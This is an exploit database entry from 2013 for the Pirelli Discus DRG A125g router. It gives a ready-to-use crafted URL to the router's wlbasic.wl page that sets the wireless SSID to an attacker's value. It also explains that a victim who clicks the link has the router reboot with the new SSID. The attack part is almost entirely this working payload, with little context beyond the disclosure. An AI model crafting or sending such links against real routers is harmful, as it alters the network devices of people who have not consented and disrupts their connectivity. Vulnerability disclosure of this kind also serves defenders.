Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability

2013-11-24T00:00:00
ID 1337DAY-ID-21562
Type zdt
Reporter Sebastián Magof
Modified 2013-11-24T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof
 
info: where the parameter "wlSsid"  is where the attacker will enter the
new SSID. If the victim clicks on the url your modem / router will reboot
automatically with the new SSID provided by the attacker.

#  0day.today [2018-01-04]  #